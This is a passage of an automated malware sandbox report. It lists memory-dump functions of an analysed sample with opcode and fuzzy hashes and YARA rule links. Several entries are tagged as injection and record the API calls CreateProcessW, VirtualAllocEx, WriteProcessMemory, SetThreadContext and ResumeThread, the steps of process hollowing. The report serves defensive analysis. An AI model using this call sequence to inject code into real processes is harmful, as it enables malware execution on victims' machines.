                                        • Opcode Fuzzy Hash: b33cf2692da308e67a80438174e10f4e14cbd8753d7bf15f35fec6741b171776
                                        • Instruction Fuzzy Hash: A2B146B4E142598FCB04CFE9C540ADEFBF2BF89300F15D56AD416AB258E7349E018B65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD4758, Relevance: .2, Instructions: 185COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31fa96513df10d298e4898fa6b736442d4b6b7b9947ff33c4c839acb882a30bd
                                        • Instruction ID: 3866995bbf0a6720f2aa2f3e6825b059aed83bd0a078d2f839e203e2c09347f7
                                        • Opcode Fuzzy Hash: 31fa96513df10d298e4898fa6b736442d4b6b7b9947ff33c4c839acb882a30bd
                                        • Instruction Fuzzy Hash: 5B81B1B4E012498FDB08CFE9C954AADFBB2BF89300F14852AD919AB354D7349906CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD4768, Relevance: .2, Instructions: 183COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03235d449ade52f43233067d68e0c77c0b912acf7b087bbbe2481583e16f185b
                                        • Instruction ID: aadc25ee6fb78290ab605e704dc47b360acfbaa8a6c5433d0ebe8b3c3cf32c62
                                        • Opcode Fuzzy Hash: 03235d449ade52f43233067d68e0c77c0b912acf7b087bbbe2481583e16f185b
                                        • Instruction Fuzzy Hash: 7C81C2B4E112598FDB08CFEAC944AADFBB2BF89300F14852AD919BB354D7349905CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADDDD0, Relevance: .2, Instructions: 182COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b42fcc2369781c0cedd33d23aaad5ce16470cca46cbc715ca009cb5a44c6562
                                        • Instruction ID: f0484a2a9dbc078d62087ed34df58b1d872dab422fb8e57cf33143450d9f904c
                                        • Opcode Fuzzy Hash: 4b42fcc2369781c0cedd33d23aaad5ce16470cca46cbc715ca009cb5a44c6562
                                        • Instruction Fuzzy Hash: D26109B4E5A209DFCB04CFE5D5806DEFFB6AB9A310F24A42AD016BB254D7349941CB14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADE090, Relevance: .1, Instructions: 147COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 315524abc6c1e85206a7bf8974a9bf74b004cd3e0ed822f6e534706e8b2751bd
                                        • Instruction ID: faa31f195541a4cf8700a447b1e9bdd37b52148c6e4d799226732e73997040fc
                                        • Opcode Fuzzy Hash: 315524abc6c1e85206a7bf8974a9bf74b004cd3e0ed822f6e534706e8b2751bd
                                        • Instruction Fuzzy Hash: 27516FB1E4422ACBCB28CF65CC40BE9B7B6BF99300F1081E6D51AA7254E7705E81CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADE080, Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52411c39a3f7dc4c6ad06b1141c339ec21d2d673b742ab9bef63d31edf3b32b3
                                        • Instruction ID: 3505c11099d6b26f918325606dec71a88e00259983407f58871625b44e051e6b
                                        • Opcode Fuzzy Hash: 52411c39a3f7dc4c6ad06b1141c339ec21d2d673b742ab9bef63d31edf3b32b3
                                        • Instruction Fuzzy Hash: CF515EB1E4462A8FCB28CF65CD44BD9B7B2BF99300F1082EAD519A7254EB705E85CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADE2B0, Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4a1ab263a051905ba0dd93cc80ffdc9b63f14874cdee178637907a57e9e18ce
                                        • Instruction ID: 364e7156a650318712d4a211bdcff4346d5b0faacf2267523e26f6bccab22bff
                                        • Opcode Fuzzy Hash: a4a1ab263a051905ba0dd93cc80ffdc9b63f14874cdee178637907a57e9e18ce
                                        • Instruction Fuzzy Hash: 4151F7B5E4422ACFCB64CF65C944BE9B7B2BF99300F1042EAD51AA7254E7709E85CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADE365, Relevance: .1, Instructions: 105COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2b2ed79cdc8d688f4cd0de04d90bf75e63b6ea5959429ed7501554b510fb850
                                        • Instruction ID: b9a4ba6f35657d8c9591b009964c8e4e43836650aabf71a58375e6b61e7b81c0
                                        • Opcode Fuzzy Hash: b2b2ed79cdc8d688f4cd0de04d90bf75e63b6ea5959429ed7501554b510fb850
                                        • Instruction Fuzzy Hash: 56411AB5E5461A8FCB24CF65C940BD9B7B2BF99300F1082E6D11AA7654E7709EC1CF40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD5E20, Relevance: .1, Instructions: 81COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d468b143645360cfb902c89c06f3f7432a3891341917d92f147952fbdd0d4c19
                                        • Instruction ID: 7e65a7a36429021e93997e8cfc323a8bc796b307d8652e9c167cf8ab3a809360
                                        • Opcode Fuzzy Hash: d468b143645360cfb902c89c06f3f7432a3891341917d92f147952fbdd0d4c19
                                        • Instruction Fuzzy Hash: 523147B1E016588BDB18CFAAD8443DEFFF2AFC9310F14C16AD419AA265DB341A45CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD4C34, Relevance: 1.6, APIs: 1, Instructions: 146processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 07ADF6EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: ce568bcbf1f645da73e64f0b85d8c5cbd310120cf5b6497a0cb9ddc1ebc048f5
                                        • Instruction ID: 541cd484e81127c291cc6eb821d62bc7684537bbd31136a84162257eb6d35f38
                                        • Opcode Fuzzy Hash: ce568bcbf1f645da73e64f0b85d8c5cbd310120cf5b6497a0cb9ddc1ebc048f5
                                        • Instruction Fuzzy Hash: 205128B1D00319DFDB24CF95C880BDEBBB5BF88314F1580A9E919A7210DB749A89CF61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01B407C4, Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01B408E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.296138683.0000000001B40000.00000040.00000001.sdmp, Offset: 01B40000, based on PE: false
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 07be3014ee27fe7ddb8a7b46d9199149357077d33ad584207a6bdf65bd4e8a6d
                                        • Instruction ID: 05519f6a9be61569021191c538e24234e0b60d81313ee3d9d9e37f1157788bfa
                                        • Opcode Fuzzy Hash: 07be3014ee27fe7ddb8a7b46d9199149357077d33ad584207a6bdf65bd4e8a6d
                                        • Instruction Fuzzy Hash: CA51E2B1D00309DFDB14DFA9C884ADEBBB5BF48314F24826AE918AB210D7719845CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01B407D0, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01B408E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.296138683.0000000001B40000.00000040.00000001.sdmp, Offset: 01B40000, based on PE: false
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: c44d7c28779ddc520d92c483f6d0b09ecf85f388b19e1ffbb4986b2841ce4c61
                                        • Instruction ID: e73d3d22e8ee4dc3b8b0a3dd3db37e73391f7247a3725e0b7a83a839223f787f
                                        • Opcode Fuzzy Hash: c44d7c28779ddc520d92c483f6d0b09ecf85f388b19e1ffbb4986b2841ce4c61
                                        • Instruction Fuzzy Hash: FF41D1B1D003099FDB14DF99C984ADEBBB5FF88314F24826AE919AB210D7709845CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01B42D90, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                        Download Yara Rule
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 01B42E51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.296138683.0000000001B40000.00000040.00000001.sdmp, Offset: 01B40000, based on PE: false
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        • Opcode ID: c6f106be1f0729739a158e69596177d80fc38b792cef7da4c6239131e0bbf01e
                                        • Instruction ID: 164878493172f55982fe2b994d3cb31469afee849f5e2c0fbfa8806d2a321e06
                                        • Opcode Fuzzy Hash: c6f106be1f0729739a158e69596177d80fc38b792cef7da4c6239131e0bbf01e
                                        • Instruction Fuzzy Hash: 014149B9900305DFCB28CF99D448AAABBF5FF88314F25C499E519A7321D370A841DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADFB40, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07ADFBCD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: c810e50e8f4eb4e6979d74b1adc8dda5f4b20660a76d0c1b146b5dfa44426993
                                        • Instruction ID: 15561fa0d27862fcca71457026e6662a20214962cae26ba72ea3e6bcee7ecbea
                                        • Opcode Fuzzy Hash: c810e50e8f4eb4e6979d74b1adc8dda5f4b20660a76d0c1b146b5dfa44426993
                                        • Instruction Fuzzy Hash: B821E4B59002599FCB10CFAAD885BDEBBF4FF48314F14852AE929A3240D774A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADF9C8, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ADFA47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 6041b90590432b2b73bf4b8b02cc86bfdde6d20691ffcb850195f5be07fe8588
                                        • Instruction ID: 19068b2805352aa758b40c2eb5ae0eaf782adecbc4626788fa3cc95dc2781336
                                        • Opcode Fuzzy Hash: 6041b90590432b2b73bf4b8b02cc86bfdde6d20691ffcb850195f5be07fe8588
                                        • Instruction Fuzzy Hash: 3821D0B59002599FCB10CF9AD884ADEBBF4FB48324F10842AE929A3250D374A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADF908, Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 07ADF97F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID: ContextThread
                                        • String ID:
                                        • API String ID: 1591575202-0
                                        • Opcode ID: 2e8a22d2673f8c0ba7834ba530e4a443584abc18167df7e275840807f094754c
                                        • Instruction ID: bcc7dd399028cd050396ab833e5f2db230c0a32ebd8a596638f615fe4d130383
                                        • Opcode Fuzzy Hash: 2e8a22d2673f8c0ba7834ba530e4a443584abc18167df7e275840807f094754c
                                        • Instruction Fuzzy Hash: 262108B1D0061A9FCB10CF9AC9857EEFBF4BB48224F158169E429A3240D774A9448FA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADFA98, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ADFB03
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 4eec2c62a89e4eebeeaf5ede011a54276137a0cfac12e3bd24315c3c36992521
                                        • Instruction ID: d4cb6de465fe2fb8c97ec4764dfb4db8ede3a358ae06e4789ee7c212fef79290
                                        • Opcode Fuzzy Hash: 4eec2c62a89e4eebeeaf5ede011a54276137a0cfac12e3bd24315c3c36992521
                                        • Instruction Fuzzy Hash: FA11E3B59002499FCB20DF9AD884BDFBBF8EB48324F148459E529A7210C775A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01B40A10, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,?,?), ref: 01B40A75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.296138683.0000000001B40000.00000040.00000001.sdmp, Offset: 01B40000, based on PE: false
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID:
                                        • API String ID: 1378638983-0
                                        • Opcode ID: e74cd1d044e6d27c295b90eb38fc000707cea0817f5ceecf0d22008e114bd014
                                        • Instruction ID: 80dbb6e0bdcc697b0300c60be5b27abd6de5d4466a3e5601738dabf54556c6f5
                                        • Opcode Fuzzy Hash: e74cd1d044e6d27c295b90eb38fc000707cea0817f5ceecf0d22008e114bd014
                                        • Instruction Fuzzy Hash: 0F1136B5800208DFDB20DF99D488BDEBBF8EF48324F148559E914A3700C375A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 01B40A18, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowLongW.USER32(?,?,?), ref: 01B40A75
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.296138683.0000000001B40000.00000040.00000001.sdmp, Offset: 01B40000, based on PE: false
                                        Similarity
                                        • API ID: LongWindow
                                        • String ID:
                                        • API String ID: 1378638983-0
                                        • Opcode ID: fcb90a0ef8d76b9b6ef5d9983c4933602f09c54d1a235e3ea97a40c5ef52b168
                                        • Instruction ID: d292dea4f2ac4875a2222417ca77ff1be89434ce18d2284ccd68f9db5874cb32
                                        • Opcode Fuzzy Hash: fcb90a0ef8d76b9b6ef5d9983c4933602f09c54d1a235e3ea97a40c5ef52b168
                                        • Instruction Fuzzy Hash: 691115B5800209DFDB20DF99D484BDEFBF8EB48324F10855AE915A3300C374A944CFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADFCF8, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 4642519a4e2289a1a4398c725e9422cbe7a6208149ef9e32f164e0e632265dc9
                                        • Instruction ID: 5675f1568e6b3a5218bc6cb0c51f4420b7499bda383bef50ede8b04c8ff0a890
                                        • Opcode Fuzzy Hash: 4642519a4e2289a1a4398c725e9422cbe7a6208149ef9e32f164e0e632265dc9
                                        • Instruction Fuzzy Hash: BA1115B58002098FCB20DF9AD844BDEFBF4EB48324F10845AD529A3300C775A944CFA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0161D3D8, Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295310079.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 834fa8110f2a856e7aea02596615cb5ce39c9647eacbb65f5491c5e9ffdb919c
                                        • Instruction ID: 096cb3b793129786bb06a2663416647e64d4bede241577469af81cb0e0608ed7
                                        • Opcode Fuzzy Hash: 834fa8110f2a856e7aea02596615cb5ce39c9647eacbb65f5491c5e9ffdb919c
                                        • Instruction Fuzzy Hash: 4F2148B1544240DFDB11DF94DDC4B9ABB65FB88324F28C568E90A4F30AC336E846C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0162D1D4, Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295339628.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd66d8a4f65e28661779d1e79a9a950cb7b4eb6522842755625de7dd6ae10bec
                                        • Instruction ID: 14966e5bc05a8dda8030f5961da2bd58b5b2d42b50116c1dc44c4ae048dd2798
                                        • Opcode Fuzzy Hash: dd66d8a4f65e28661779d1e79a9a950cb7b4eb6522842755625de7dd6ae10bec
                                        • Instruction Fuzzy Hash: CF212571504600EFDB11DF94DDC0B26BB65FB85324F24C5ADEA094B346C336D806CE61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0162D01C, Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295339628.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ebec2e0cc87c9f10d7262c5f79f38a956704347a3f9401e0080c4f9aab8a941
                                        • Instruction ID: bfe5ca49d255096459fe3d198ce9fcca92323c30ff830d75f9dd83c6f0a4e4f1
                                        • Opcode Fuzzy Hash: 0ebec2e0cc87c9f10d7262c5f79f38a956704347a3f9401e0080c4f9aab8a941
                                        • Instruction Fuzzy Hash: 58212271508640DFCB11DF94DCC0B26BB65FB84354F24C9A9E90A4B396C33AD847CA61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0162D006, Relevance: .1, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295339628.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd64fc118cbb06509360013ba5c69aaece619241149bfdacc911d9842fed2a14
                                        • Instruction ID: 67b6b283770d94b83d1c6527d7b23cdc1b89bf28fbddf63b17c2833d8309a0d5
                                        • Opcode Fuzzy Hash: fd64fc118cbb06509360013ba5c69aaece619241149bfdacc911d9842fed2a14
                                        • Instruction Fuzzy Hash: B52180754087809FCB02CF64D994B11BF71EB46314F28C5DAD8498B2A7C33A985ACB62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0161D3D3, Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295310079.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                        • Instruction ID: d4401606a18390c92a810577f279e07eefa3e46ea2feb3333a7adbc503c2730b
                                        • Opcode Fuzzy Hash: 184b28d4c02099fc0a852538407da5dc7e76361d293f30cbc9c792e0a6473fb9
                                        • Instruction Fuzzy Hash: C011AF76444280DFDB16CF54D9C4B56BF71FB84324F28C6A9D8090B65BC33AE45ACBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0162D1CF, Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295339628.000000000162D000.00000040.00000001.sdmp, Offset: 0162D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
                                        • Instruction ID: 764dae7788295069abba5d6325b8bff753f87ea71d29ba288b15c0f2055528d5
                                        • Opcode Fuzzy Hash: 7a50eb1ea87dfee72d6b871baeb290936708f59e98a32fcf65e78a96e58bb0a8
                                        • Instruction Fuzzy Hash: 8911B875904680DFDB02CF58D9C0B15FBA1FB85224F28C6AAD9494B756C33AD84ACF62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0161D745, Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295310079.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 383b86c183184f8b5916cdff7f47ed2330f83c5348665cf9d7b6e3f04a3ea852
                                        • Instruction ID: 2077e20cc4032121bb56fafd07c6f08cce7476389ec548172922d4fecfdc21af
                                        • Opcode Fuzzy Hash: 383b86c183184f8b5916cdff7f47ed2330f83c5348665cf9d7b6e3f04a3ea852
                                        • Instruction Fuzzy Hash: 5701D4714083809AE7205A59CC88B76BB98EF41264F0C855AEE055A24AD3799845C6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0161D744, Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.295310079.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 786d42534837a1d5d5a3bb43480e2b86582a3cea4e21c80bc43c05d3df33e0c4
                                        • Instruction ID: c051e09cdd70829de8caffe071957f1ac557db5b55d567138aa7bfc7704b48da
                                        • Opcode Fuzzy Hash: 786d42534837a1d5d5a3bb43480e2b86582a3cea4e21c80bc43c05d3df33e0c4
                                        • Instruction Fuzzy Hash: 51F04F754042849AE7119E59DCC8B72FB98EB41674F18C55AED085A28AC3B99844CAB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 07AD58B1, Relevance: 3.9, Strings: 3, Instructions: 172COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: <E`/$<E`/$X
                                        • API String ID: 0-157783635
                                        • Opcode ID: fcc4c5304e54e1e82a07355b2c787c8c8838c990fda82c9fae48081ee6def89a
                                        • Instruction ID: f94361d08c9d2e9486f5e66321e9e9aac74cb2c6c76e9732ac8d12b5d82a41fa
                                        • Opcode Fuzzy Hash: fcc4c5304e54e1e82a07355b2c787c8c8838c990fda82c9fae48081ee6def89a
                                        • Instruction Fuzzy Hash: F27129B4E1520ADFCB04CF99D480AEEFBB2FB99310F10856AE426A7314C7349952CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD8D90, Relevance: 3.9, Strings: 3, Instructions: 120COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: DWv$g><$z%6
                                        • API String ID: 0-315631655
                                        • Opcode ID: a7352c19fc39208aae0fc7bd2d834cb13a97237710624b78629141d295ba7317
                                        • Instruction ID: ff92e8f9f3d6175a48e4764b647754187871b966f317d7c8d8879f3e32ab3ac5
                                        • Opcode Fuzzy Hash: a7352c19fc39208aae0fc7bd2d834cb13a97237710624b78629141d295ba7317
                                        • Instruction Fuzzy Hash: 454109B0D1520ADFCB04CFAAC5815EEFBF2EF99350F14C46AC466A7254D7389A428F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD8DA0, Relevance: 3.9, Strings: 3, Instructions: 113COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: DWv$g><$z%6
                                        • API String ID: 0-315631655
                                        • Opcode ID: f00da8fc9aa68bb4a856bbf9805b0ea824dcec200234a8263abe9652aebd11a2
                                        • Instruction ID: 265fcd1203e6568a6dd47d7129ee1b8a5c505deed745b0ae42f4c3fdc11fa505
                                        • Opcode Fuzzy Hash: f00da8fc9aa68bb4a856bbf9805b0ea824dcec200234a8263abe9652aebd11a2
                                        • Instruction Fuzzy Hash: AA4108B0D1560ADFCB04CFAAC5815AEFBB2FF98300F14C469C466A7254D7389A418F64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADB762, Relevance: .4, Instructions: 370COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 209bfa324e206ad0fa08258cb9df0cc2f2a2b5724760049bd5875b46f12e7aa1
                                        • Instruction ID: dc7ef41e1060b50f3e0a59b2b1e7c60bf46473722fab28f3b42ccaf07106ffc9
                                        • Opcode Fuzzy Hash: 209bfa324e206ad0fa08258cb9df0cc2f2a2b5724760049bd5875b46f12e7aa1
                                        • Instruction Fuzzy Hash: 0FD1CFF1E0521A8FCB14DFB8C5416AEBBF2EF89214F16856DD426A7354DB388D018BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD7BB1, Relevance: .2, Instructions: 175COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 062262c9b6371206bb0f50e2db0b94b1a256177be8a073b479a364913b8bb4b3
                                        • Instruction ID: 7829b306ec61113003a7ec9c142bb04b16f6d0ee0f2e16c65d8506c6281ad075
                                        • Opcode Fuzzy Hash: 062262c9b6371206bb0f50e2db0b94b1a256177be8a073b479a364913b8bb4b3
                                        • Instruction Fuzzy Hash: B571C074A15219CFCB44CFA9C5849AEBBF1FF89310F14855AE41AAB361D330AE42CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD7BC0, Relevance: .2, Instructions: 172COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84547fc6fa112cfed94780533ffdc804b9e1c77b0291986435f7bcabbbd6f425
                                        • Instruction ID: 392f4fbdae17ba85741a0b00c3ac295e126d8e5a9eecb56fedbcf1a987268b27
                                        • Opcode Fuzzy Hash: 84547fc6fa112cfed94780533ffdc804b9e1c77b0291986435f7bcabbbd6f425
                                        • Instruction Fuzzy Hash: F2719E74A152198FCB44CFA9D5849ADFBF1FF89310F148559E41AAB320D734AE42CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD8FC8, Relevance: .2, Instructions: 166COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
